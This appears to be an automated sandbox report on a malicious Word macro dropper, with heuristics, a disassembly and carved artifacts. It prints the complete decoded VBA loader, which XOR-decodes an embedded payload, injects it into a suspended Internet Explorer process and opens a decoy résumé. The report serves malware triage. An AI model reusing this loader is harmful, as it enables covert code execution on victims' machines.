Verdict: MALICIOUS
Risk Score: 508
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The VBA macros contain calls to WinAPI functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating the likely intent to inject and execute a second-stage payload. The presence of XOR-encoded strings and embedded OLE packages further supports this malicious behavior.
Heuristics (16)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical; CVE likely; CVE_2007_3899]: Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- OLE with Ole10Native — possible CVE-2026-21514 exploitation [high; CVE likely; CVE_2026_21514]: Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
- ClamAV: Doc.Macro.Injection-6355574-0 [critical; CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
- Reference to WriteProcessMemory API [critical; SC_STR_WRITEPROCESSMEMORY]
- Reference to CreateRemoteThread API [critical; SC_STR_CREATEREMOTETHREAD]
- XOR-encoded strings (key 0x5A) [critical; SC_XOR_ENCODED]: Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
Disassembly
Attempted x86 opcode disassembly of the flagged region. The many 0x5a bytes match the XOR key reported above, so this listing is more consistent with encoded string data than with genuine code:

    0003C635  1b1e            sbb ebx, dword ptr [esi]
    0003C637  0c1b            or al, 0x1b
    0003C639  0a13            or dl, byte ptr [ebx]
    0003C63B  6968741e16165a  imul ebp, dword ptr [eax + 0x74], 0x5a16161e
    0003C642  5a              pop edx
    0003C643  5a              pop edx
    0003C644  5a              pop edx
    0003C645  3939            cmp dword ptr [ecx], edi
    0003C647  295a0f          sub dword ptr [edx + 0xf], ebx
    0003C64A  0e              push cs
    0003C64B  1c77            sbb al, 0x77
    0003C64D  625a5a          bound ebx, qword ptr [edx + 0x5a]
    0003C650  5a              pop edx
    0003C651  0f0e            femms
    0003C653  1c77            sbb al, 0x77
    0003C655  6b6c161f5a      imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
    0003C65A  5a              pop edx
    0003C65B  5a              pop edx
    0003C65C  5a              pop edx
    0003C65D  0f1413          unpcklps xmm2, xmmword ptr [ebx]
    0003C660  19151e1f5a1d    sbb dword ptr [0x1d5a1f1e], edx
    0003C666  3f              aas
    0003C667  2e0a28          or ch, byte ptr cs:[eax]
    0003C66A  35393f2929      xor eax, 0x29293f39
    0003C66F  0d33343e35      or eax, 0x353e3433
    0003C674  2d092e3b2e      sub eax, 0x2e3b2e09
    0003C679  3335345a1d3f    xor esi, dword ptr [0x3f1d5a34]
    0003C67F  2e0f293f        movaps xmmword ptr cs:[edi], xmm7
    0003C683  281538303f39    sub byte ptr [0x393f3038], dl
    0003C689  2e13343c        adc esi, dword ptr cs:[esp + edi]
    0003C68D  3528373b2e      xor eax, 0x2e3b3728
    0003C692  33              .byte 0x33
    0003C693  35              .byte 0x35
    0003C694  34              .byte 0x34
- Reference to CreateProcess API [high; SC_STR_CREATEPROCESS]
- VBA macros detected [medium; OLE_VBA_MACROS; 4 related findings]: Document contains VBA macro code
  - CreateObject call [high; OLE_VBA_CREATEOBJ]. Matched lines in script:

        Dim zuyEUBwvBu
        Set zuyEUBwvBu = CreateObject("ADODB.Stream")
        zuyEUBwvBu.Type = tGokxOkxcj

  - AutoOpen macro [low; OLE_VBA_AUTOOPEN]. Matched lines in script:

        Sub AutoOpen()
        cnKxRQHXdMtg

  - Workbook_Open macro [low; OLE_VBA_WBOPEN]. Matched lines in script:

        End Sub
        Sub Workbook_Open()
        cnKxRQHXdMtg

  - Environ() call (env variable access) [low; OLE_VBA_ENVIRON]. Matched lines in script:

        If Len(Environ("ProgramW6432")) > 0 Then
        FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"

- Reference to VirtualAlloc API [medium; SC_STR_VIRTUALALLOC]
- Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9300 bytes |

SHA-256: f2abc6d250de8e3c9503849bf486c7e64fce4f2638bab40cf45f445f7419f808

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 85 of 148 identifiers look randomly generated (e.g. 'mTPHtgtuhhCgfAy') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const tGokxOkxcj = 1
Const yfCpjuXVzi = 1, iBjNEmtJSn = 2, lFYZvNmnEd = 8
Private Type svkHMGtJfRvA
xNgghSwGIXgF As Long
XHETiRnOIOTr As Long
hudVNHMplvpl As Long
AuYDBxxPUELV As Long
End Type
Private Type rpdlqsAizKtR
SBENpOaCqhhT As Long
WHZRpTmGGnPR As String
qekmUCkgSkyu As String
EtVlgTegaphC As String
MuWNfBuxTIKO As Long
kCPbmbwkSBdb As Long
fQsifyyrXPdT As Long
qpoykOvyKNlO As Long
xSbPQJFMSNnk As Long
xhCLBvXlTTBX As Long
gbMFBYRIuTmm As Long
eKsOfUYZlaxk As Long
oVTwfSdSyATN As Integer
XXqDiKTLeGYE As Integer
MrjbyoXieMAh As Long
RrBTbvECxWMh As Long
lifIeTJZPfoI As Long
YRdthPyABufO As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As LongPtr, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As LongPtr
Private Declare PtrSafe Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As LongPtr
Private Declare PtrSafe Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As LongPtr, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As LongPtr) As LongPtr
Private Declare PtrSafe Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal VdWOpNntkPgY As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#Else
Private Declare Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As Long, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As Long
Private Declare Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As Long
Private Declare Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As Long, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As Long) As Long
Private Declare Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal lpCurrentDriectory As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#End If
Sub cnKxRQHXdMtg()
Dim ORaPXCWnNLMe As Long, DEJUdyWdRzJp As Variant, DTPNyTaCSmtl As Long
Dim POVFbElAqElk As svkHMGtJfRvA
Dim AtOshUIkSfgE As rpdlqsAizKtR
Dim fsIvNhSPRjJW As String
Dim FZTUWHNdxNIa As String
Dim bPIWbDKsDK As String
Dim XdRGLKEqmF() As Byte
Dim UCFZKhmEEi As Boolean
#If VBA7 Then
Dim rWuHUgktEqbX As LongPtr, fddzPhSPliSJ As LongPtr
#Else
Dim rWuHUgktEqbX As Long, fddzPhSPliSJ As Long
#End If
DEJUdyWdRzJp = hmlhxkqg
If Len(Environ("ProgramW6432")) > 0 Then
FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
Else
FZTUWHNdxNIa = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
End If
fddzPhSPliSJ = vZwPvAkhtkWb(fsIvNhSPRjJW, FZTUWHNdxNIa, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, fsIvNhSPRjJW, AtOshUIkSfgE, POVFbElAqElk)
rWuHUgktEqbX = ccutHHdLbTqJ(POVFbElAqElk.xNgghSwGIXgF, 0, UBound(DEJUdyWdRzJp), &H1000, &H40)
For DTPNyTaCSmtl = LBound(DEJUdyWdRzJp) To UBound(DEJUdyWdRzJp)
ORaPXCWnNLMe = DEJUdyWdRzJp(DTPNyTaCSmtl)
fddzPhSPliSJ = lZilpIMnjQTS(POVFbElAqElk.xNgghSwGIXgF, rWuHUgktEqbX + DTPNyTaCSmtl, ORaPXCWnNLMe, 1, ByVal 0&)
Next DTPNyTaCSmtl
fddzPhSPliSJ = QDamTkzkAwhS(POVFbElAqElk.xNgghSwGIXgF, 0, 0, rWuHUgktEqbX, 0, 0, 0)
bPIWbDKsDK = Environ("TEMP") & "\Resume (2).doc"
XdRGLKEqmF = vdtevtae
UCFZKhmEEi = KsbcuZbpzm(bPIWbDKsDK, XdRGLKEqmF)
Set temp = ActiveDocument
Documents.Open (bPIWbDKsDK)
temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Function KsbcuZbpzm(rASJJubWmd, AtWCTjfzjw)
Dim zuyEUBwvBu
Set zuyEUBwvBu = CreateObject("ADODB.Stream")
zuyEUBwvBu.Type = tGokxOkxcj
zuyEUBwvBu.Open
zuyEUBwvBu.Write AtWCTjfzjw
zuyEUBwvBu.SaveToFile rASJJubWmd, iBjNEmtJSn
End Function
Sub AutoOpen()
cnKxRQHXdMtg
End Sub
Sub Workbook_Open()
cnKxRQHXdMtg
End Sub
Function hmlhxkqg() As Byte()
Dim hcCzdOOBNPoQmAw() As Byte
Dim mTPHtgtuhhCgfAy As Long
Dim VaegvWOIekAOUFD(7) As Byte
Dim DTPNyTaCSmtl As Long
Dim PdihewuviArgiTP() As Byte
Dim UCFZKhmEEi As Boolean
hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
VaegvWOIekAOUFD(0) = 89
VaegvWOIekAOUFD(1) = 68
VaegvWOIekAOUFD(2) = 88
VaegvWOIekAOUFD(3) = 82
VaegvWOIekAOUFD(4) = 81
VaegvWOIekAOUFD(5) = 78
VaegvWOIekAOUFD(6) = 70
VaegvWOIekAOUFD(7) = 73
DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 212481 - 1)
UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
hmlhxkqg = PdihewuviArgiTP
End Function
Function vdtevtae() As Byte()
Dim hcCzdOOBNPoQmAw() As Byte
Dim mTPHtgtuhhCgfAy As Long
Dim VaegvWOIekAOUFD(7) As Byte
Dim DTPNyTaCSmtl As Long
Dim PdihewuviArgiTP() As Byte
Dim UCFZKhmEEi As Boolean
hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
VaegvWOIekAOUFD(0) = 79
VaegvWOIekAOUFD(1) = 83
VaegvWOIekAOUFD(2) = 84
VaegvWOIekAOUFD(3) = 86
VaegvWOIekAOUFD(4) = 88
VaegvWOIekAOUFD(5) = 79
VaegvWOIekAOUFD(6) = 90
VaegvWOIekAOUFD(7) = 86
DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 91368 - 1)
UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
vdtevtae = PdihewuviArgiTP
End Function
Function KMbsvKCbcv(abArray() As Byte) As Long
Dim nLen As Long
KMbsvKCbcv = UBound(abArray) - LBound(abArray) + 1
End Function
Function IEXWPMPhCY(WIdavqNInj As String)
Dim fqQEZtmCAY() As Byte
Dim hLLoHruxpI As Integer: hLLoHruxpI = FreeFile
Open WIdavqNInj For Binary Access Read As #hLLoHruxpI
ReDim fqQEZtmCAY(0 To LOF(hLLoHruxpI) - 1)
Get #hLLoHruxpI, , fqQEZtmCAY
Close #hLLoHruxpI
IEXWPMPhCY = fqQEZtmCAY
End Function
Function lmiXHsJtIc(yRAUzytyxg() As Byte, InSWDbVSQV() As Byte) As Long
Dim JtlPFmtZxb As Boolean
Dim XvfafqmCwl As Long
Dim KhcWWSjSzH As Long
Dim NfjyhACega As Long
Dim HZBcGDGTdi As Long
JtlPFmtZxb = False
NfjyhACega = KMbsvKCbcv(yRAUzytyxg)
HZBcGDGTdi = KMbsvKCbcv(InSWDbVSQV)
For XvfafqmCwl = 0 To NfjyhACega
JtlPFmtZxb = True
For KhcWWSjSzH = 0 To HZBcGDGTdi - 1
If yRAUzytyxg(XvfafqmCwl + KhcWWSjSzH) <> InSWDbVSQV(KhcWWSjSzH) Then
JtlPFmtZxb = False
Exit For
End If
Next KhcWWSjSzH
If JtlPFmtZxb = True Then
Exit For
End If
Next XvfafqmCwl
If JtlPFmtZxb = False Then
lmiXHsJtIc = -1
Else
lmiXHsJtIc = XvfafqmCwl
End If
End Function
Function OdxXAAOyHk(yRAUzytyxg() As Byte, CZAMdvjYTR As Long, yOCftnDOtp As Long) As Byte()
Dim XJZLYcxXxl() As Byte
Dim XvfafqmCwl As Long
For XvfafqmCwl = 0 To yOCftnDOtp
ReDim Preserve XJZLYcxXxl(XvfafqmCwl)
XJZLYcxXxl(XvfafqmCwl) = yRAUzytyxg(CZAMdvjYTR + XvfafqmCwl)
Next XvfafqmCwl
OdxXAAOyHk = XJZLYcxXxl
End Function
Function vYtGxWFzfz(DTuPXKmgaH() As Byte, yOCftnDOtp As Long)
Dim XexIxXIqPo As Byte
Dim RmhahkOqfk As Long
XexIxXIqPo = 90
For RmhahkOqfk = 0 To yOCftnDOtp - 1
DTuPXKmgaH(RmhahkOqfk) = DTuPXKmgaH(RmhahkOqfk) Xor XexIxXIqPo
Next RmhahkOqfk
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612170789/Ole10Native | 91842 bytes |

SHA-256: 684512f174a335f854fdbad1e66292baad0f362863d3b314dad8bd4a68b753a7

Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact entropy is 7.92, consistent with packed or encrypted content.

| Filename | Kind | Source | Size |
|---|---|---|---|
| ole10native_01.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612170790/Ole10Native | 212955 bytes |

SHA-256: 17cf52f85bc83040e8eb6559205231c0c10e971a23863663330a61f4a2c1caf9